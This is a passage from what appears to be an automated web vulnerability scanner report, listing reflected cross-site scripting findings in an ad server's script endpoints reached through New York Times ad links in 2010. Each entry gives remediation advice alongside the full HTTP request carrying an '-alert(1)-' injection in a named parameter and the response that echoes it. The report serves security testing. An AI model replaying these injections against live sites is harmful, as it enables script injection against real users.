e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf5acee'-alert(1)-'0d1577c5b6e&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.38. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3de13'-alert(1)-'20284093fee was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e33de13'-alert(1)-'20284093fee&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e33de13'-alert(1)-'20284093fee&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.39. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a5cf"-alert(1)-"9d93ddc41f was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e39a5cf"-alert(1)-"9d93ddc41f&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6697

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e39a5cf"-alert(1)-"9d93ddc41f&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUr
...[SNIP]...

4.40. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90833'-alert(1)-'1a292f51b94 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90833'-alert(1)-'1a292f51b94&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90833'-alert(1)-'1a292f51b94&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.41. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e889c"-alert(1)-"f675ac94119 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclicke889c"-alert(1)-"f675ac94119&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclicke889c"-alert(1)-"f675ac94119&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

4.42. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ed64"-alert(1)-"a101d628bd6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=12898020729ed64"-alert(1)-"a101d628bd6&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=12898020729ed64"-alert(1)-"a101d628bd6&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.43. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c075a'-alert(1)-'2933f51287e was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072c075a'-alert(1)-'2933f51287e&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072c075a'-alert(1)-'2933f51287e&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.44. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2951d"-alert(1)-"f11c4fafd07 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto2951d"-alert(1)-"f11c4fafd07&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2951d"-alert(1)-"f11c4fafd07&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=
...[SNIP]...

4.45. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe6d8'-alert(1)-'94632e14065 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotofe6d8'-alert(1)-'94632e14065&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotofe6d8'-alert(1)-'94632e14065&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=
...[SNIP]...

4.46. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cfd7'-alert(1)-'0203b74b4cd was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.21cfd7'-alert(1)-'0203b74b4cd&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:29 GMT
Expires: Mon, 15 Nov 2010 07:24:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
cs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.21cfd7'-alert(1)-'0203b74b4cd&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.47. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d961"-alert(1)-"dd73ef3e141 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.22d961"-alert(1)-"dd73ef3e141&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:25 GMT
Expires: Mon, 15 Nov 2010 07:24:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6110

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
cs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.22d961"-alert(1)-"dd73ef3e141&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallo
...[SNIP]...

4.48. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d9ae"-alert(1)-"9a6023687c5 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt12d9ae"-alert(1)-"9a6023687c5&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:16 GMT
Expires: Mon, 15 Nov 2010 07:24:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
